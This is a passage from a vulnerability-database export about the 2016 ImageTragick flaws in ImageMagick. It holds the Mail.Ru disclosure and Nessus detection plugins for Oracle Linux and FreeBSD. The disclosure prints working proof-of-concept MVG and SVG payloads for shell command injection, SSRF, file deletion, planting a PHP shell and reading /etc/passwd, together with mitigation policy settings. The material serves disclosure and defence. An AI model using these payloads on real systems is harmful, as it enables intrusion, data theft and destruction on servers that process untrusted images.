dos / poc", "edition": 1, "published": "2016-05-04T00:00:00", "type": "zdt", "title": "ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-04T00:00:00", "href": "https://0day.today/exploit/description/25991", "id": "1337DAY-ID-25991", "sourceData": "Nikolay Ermishkin from the Mail.Ru Security Team discovered several\r\nvulnerabilities in ImageMagick.\r\nWe've reported these 
issues to developers of ImageMagick and they made a\r\nfix for RCE in sources and released new version (6.9.3-9 released\r\n2016-04-30 http://legacy.imagemagick.org/script/changelog.php), but this\r\nfix seems to be incomplete. We are still working with developers.\r\n \r\nImageMagick: Multiple vulnerabilities in image decoder\r\n \r\n1. CVE-2016-3714 - Insufficient shell characters filtering leads to\r\n(potentially remote) code execution\r\n \r\nInsufficient filtering for filename passed to delegate's command allows\r\nremote code execution during conversion of several file formats.\r\n \r\nImageMagick allows to process files with external libraries. This\r\nfeature is called 'delegate'. It is implemented as a system() with\r\ncommand string ('command') from the config file delegates.xml with\r\nactual value for different params (input/output filenames etc). Due to\r\ninsufficient %M param filtering it is possible to conduct shell command\r\ninjection. One of the default delegate's command is used to handle https\r\nrequests:\r\n\"wget\" -q -O \"%o\" \"https:%M\"\r\nwhere %M is the actual link from the input. It is possible to pass the\r\nvalue like `https://example.com\"|ls \"-la` and execute unexpected 'ls\r\n-la'. (wget or curl should be installed)\r\n \r\n$ convert 'https://example.com\"|ls \"-la' out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n \r\n \r\nThe most dangerous part is ImageMagick supports several formats like\r\nsvg, mvg (thanks to https://hackerone.com/stewie for his research of\r\nthis file format and idea of the local file read vulnerability in\r\nImageMagick, see below), maybe some others - which allow to include\r\nexternal files from any supported protocol including delegates. 
As a\r\nresult, any service, which uses ImageMagick to process user supplied\r\nimages and uses default delegates.xml / policy.xml, may be vulnerable to\r\nthis issue.\r\n \r\nexploit.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://example.com/image.jpg\"|ls \"-la)'\r\npop graphic-context\r\n \r\nexploit.svg\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" standalone=\"no\"?>\r\n<!DOCTYPE svg PUBLIC \"-//W3C//DTD SVG 1.1//EN\"\r\n\"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd\">\r\n<svg width=\"640px\" height=\"480px\" version=\"1.1\"\r\nxmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\r\n\"http://www.w3.org/1999/xlink\">\r\n<image xlink:href=\"https://example.com/image.jpg\"|ls \"-la\"\r\nx=\"0\" y=\"0\" height=\"640px\" width=\"480px\"/>\r\n</svg>\r\n \r\n$ convert exploit.mvg out.png\r\ntotal 32\r\ndrwxr-xr-x 6 user group 204 Apr 29 23:08 .\r\ndrwxr-xr-x+ 232 user group 7888 Apr 30 10:37 ..\r\n...\r\n \r\nImageMagick tries to guess the type of the file by it's content, so\r\nexploitation doesn't depend on the file extension. You can rename\r\nexploit.mvg to exploit.jpg or exploit.png to bypass file type checks. In\r\naddition, ImageMagick's tool 'identify' is also vulnerable, so it can't\r\nbe used as a protection to filter file by it's content and creates\r\nadditional attack vectors (e.g. via 'less exploit.jpg', because\r\n'identify' is invoked via lesspipe.sh).\r\nUbuntu 14.04 and OS X, latest system packages (ImageMagick 6.9.3-7 Q16\r\nx86_64 2016-04-27 and ImageMagick 6.8.6-10 2016-04-29 Q16) and latest\r\nsources from 6 and 7 branches all are vulnerable. Ghostscript and wget\r\n(or curl) should be installed on the system for successful PoC\r\nexecution. For svg PoC ImageMagick's svg parser should be used, not rsvg.\r\n \r\nAll other issues also rely on dangerous ImageMagick feature of external\r\nfiles inclusion from any supported protocol in formats like svg and mvg.\r\n \r\n2. 
CVE-2016-3718 - SSRF\r\nIt is possible to make HTTP GET or FTP request:\r\n \r\nssrf.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n \r\n$ convert ssrf.mvg out.png # makes http request to example.com\r\n \r\n3. CVE-2016-3715 - File deletion\r\nIt is possible to delete files by using ImageMagick's 'ephemeral' pseudo\r\nprotocol which deletes files after reading:\r\n \r\ndelete_file.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n \r\n$ touch /tmp/delete.txt\r\n$ convert delete_file.mvg out.png # deletes /tmp/delete.txt\r\n \r\n4. CVE-2016-3716 - File moving\r\nIt is possible to move image files to file with any extension in any\r\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\r\nimage.gif should exist in known location - /tmp/ for PoC (in real life\r\nit may be web service written in PHP, which allows to upload raw txt\r\nfiles and process images with ImageMagick):\r\n \r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n \r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" />\r\n</image>\r\n \r\n/tmp/image.gif - image with php shell inside\r\n(https://www.secgeek.net/POC/POC.gif for example)\r\n \r\n$ convert file_move.mvg out.png # moves /tmp/image.gif to /var/www/shell.php\r\n \r\n5. 
CVE-2016-3717 - Local file read (independently reported by original\r\nresearch author - https://hackerone.com/stewie)\r\nIt is possible to get content of the files from the server by using\r\nImageMagick's 'label' pseudo protocol:\r\n \r\nfile_read.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@...c/passwd'\r\npop graphic-context\r\n \r\n$ convert file_read.mvg out.png # produces file with text rendered from\r\n/etc/passwd\r\n \r\n \r\nHow to mitigate the vulnerability.\r\n \r\nAvailable patches appear to be incomplete.\r\nIf you use ImageMagick or an affected library, we recommend you mitigate\r\nthe known vulnerabilities by doing at least one of these two things (but\r\npreferably both!):\r\n1. Verify that all image files begin with the expected \u201cmagic bytes\u201d\r\ncorresponding to the image file types you support before sending them to\r\nImageMagick for processing. (see FAQ for more info)\r\n2. Use a policy file to disable the vulnerable ImageMagick coders. The\r\nglobal policy for ImageMagick is usually found in \u201c/etc/ImageMagick\u201d.\r\nThis policy.xml example will disable the coders EPHEMERAL, URL, HTTPS, MVG, and\r\nMSL:\r\n \r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n \r\n \r\nVulnerability Disclosure Timeline:\r\nApril, 21 2016 - file read vulnerability report for one of My.Com\r\nservices from https://hackerone.com/stewie received by Mail.Ru Security\r\nTeam. 
Issue is reportedly known to ImageMagick team.\r\nApril, 21 2016 - file read vulnerability patched by My.Com development team\r\nApril, 28 2016 - code execution vulnerability in ImageMagick was found\r\nby Nikolay Ermishkin from Mail.Ru Security Team while researching\r\noriginal report\r\nApril, 30 2016 - code execution vulnerability reported to ImageMagick\r\ndevelopment team\r\nApril, 30 2016 - code execution vulnerability fixed by ImageMagick\r\n(incomplete fix)\r\nApril, 30 2016 - fixed ImageMagick version 6.9.3-9 published (incomplete fix)\r\nMay, 1 2016 - ImageMagick informed of the fix bypass\r\nMay, 2 2016 - limited disclosure to 'distros' mailing list\r\nMay, 3 2016 - public disclosure at https://imagetragick.com/\n\n# 0day.today [2018-04-02] #", "sourceHref": "https://0day.today/exploit/25991", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T12:50:39", "description": "From Red Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. 
A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. (CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. 
Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.", "edition": 27, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-11T00:00:00", "title": "Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-11T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:ImageMagick-c++", "cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:ImageMagick", "p-cpe:/a:oracle:linux:ImageMagick-devel", "p-cpe:/a:oracle:linux:ImageMagick-doc", "p-cpe:/a:oracle:linux:ImageMagick-c++-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:ImageMagick-perl"], "id": "ORACLELINUX_ELSA-2016-0726.NASL", "href": "https://www.tenable.com/plugins/nessus/91032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2016:0726 and \n# Oracle Linux Security Advisory ELSA-2016-0726 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91032);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n script_xref(name:\"RHSA\", value:\"2016:0726\");\n\n script_name(english:\"Oracle Linux 6 / 7 : ImageMagick (ELSA-2016-0726) (ImageTragick)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red 
Hat Security Advisory 2016:0726 :\n\nAn update for ImageMagick is now available for Red Hat Enterprise\nLinux 6 and Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nImageMagick is an image display and manipulation tool for the X Window\nSystem that can read and write multiple image formats.\n\nSecurity Fix(es) :\n\n* It was discovered that ImageMagick did not properly sanitize certain\ninput before passing it to the delegate functionality. A remote\nattacker could create a specially crafted image that, when processed\nby an application using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would lead to arbitrary execution of shell\ncommands with the privileges of the user running the application.\n(CVE-2016-3714)\n\n* It was discovered that certain ImageMagick coders and\npseudo-protocols did not properly prevent security sensitive\noperations when processing specially crafted images. A remote attacker\ncould create a specially crafted image that, when processed by an\napplication using ImageMagick or an unsuspecting user using the\nImageMagick utilities, would allow the attacker to delete, move, or\ndisclose the contents of arbitrary files. (CVE-2016-3715,\nCVE-2016-3716, CVE-2016-3717)\n\n* A server-side request forgery flaw was discovered in the way\nImageMagick processed certain images. A remote attacker could exploit\nthis flaw to mislead an application using ImageMagick or an\nunsuspecting user using the ImageMagick utilities into, for example,\nperforming HTTP(S) requests or opening FTP sessions via specially\ncrafted images. 
(CVE-2016-3718)\n\nNote: This update contains an updated /etc/ImageMagick/policy.xml file\nthat disables the EPHEMERAL, HTTPS, HTTP, URL, FTP, MVG, MSL, TEXT,\nand LABEL coders. If you experience any problems after the update, it\nmay be necessary to manually adjust the policy.xml file to match your\nrequirements. Please take additional precautions to ensure that your\napplications using the ImageMagick library do not process malicious or\nuntrusted files before doing so.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-May/006021.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected imagemagick packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ImageMagick-doc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:ImageMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-c++-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-devel-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-doc-6.7.2.7-4.el6_7\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"ImageMagick-perl-6.7.2.7-4.el6_7\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-c++-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-devel-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-doc-6.7.8.9-13.el7_2\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"ImageMagick-perl-6.7.8.9-13.el7_2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ImageMagick / ImageMagick-c++ / ImageMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, 
{"lastseen": "2021-01-06T10:47:18", "description": "Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command\nallows remote code execution during conversion of several file\nformats. Any service which uses ImageMagick to process user-supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable\nto this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral'\npseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol.", "edition": 29, "cvss3": {"score": 8.4, "vector": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-09T00:00:00", "title": "FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "modified": "2016-05-09T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ImageMagick", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ImageMagick7", "p-cpe:/a:freebsd:freebsd:ImageMagick-nox11", "p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11"], "id": "FREEBSD_PKG_0D724B05687F45279C03AF34D3B094EC.NASL", "href": "https://www.tenable.com/plugins/nessus/90979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# 
Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90979);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-3714\", \"CVE-2016-3715\", \"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\");\n\n script_name(english:\"FreeBSD : ImageMagick -- multiple vulnerabilities (0d724b05-687f-4527-9c03-af34d3b094ec) (ImageTragick)\");\n 
script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Openwall reports :\n\nInsufficient filtering for filename passed to delegate's command\nallows remote code execution during conversion of several file\nformats. Any service which uses ImageMagick to process user-supplied\nimages and uses default delegates.xml / policy.xml, may be vulnerable\nto this issue.\n\nIt is possible to make ImageMagick perform a HTTP GET or FTP request\n\nIt is possible to delete files by using ImageMagick's 'ephemeral'\npseudo protocol which deletes files after reading.\n\nIt is possible to move image files to file with any extension in any\nfolder by using ImageMagick's 'msl' pseudo protocol. msl.txt and\nimage.gif should exist in known location - /tmp/ for PoC (in real life\nit may be web service written in PHP, which allows to upload raw txt\nfiles and process images with ImageMagick).\n\nIt is possible to get content of the files from the server by using\nImageMagick's 'label' pseudo protocol.\"\n );\n # http://www.openwall.com/lists/oss-security/2016/05/03/18\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2016/05/03/18\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://imagetragick.com/\"\n );\n # https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fafa51e6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ImageMagick7-nox11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/06\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick-nox11<6.9.3.9_1,1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ImageMagick7-nox11>=7.0.0.0.b20150715<7.0.1.0_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:32:25", "description": "The remote Windows host has a version of ImageMagick installed that is\nprior to 7.0.1-1 or 6.x prior to 6.9.3-10. It is, therefore, affected\nby the following vulnerabilities :\n\n - A remote code execution vulnerability, known as\n ImageTragick, exists due to a failure to properly filter\n shell characters in filenames passed to delegate\n commands. A remote attacker can exploit this, via\n specially crafted images, to inject shell commands and\n execute arbitrary code. (CVE-2016-3714)\n\n - An unspecified flaw exists in the 'ephemeral' pseudo\n protocol that allows an attacker to delete arbitrary\n files. 
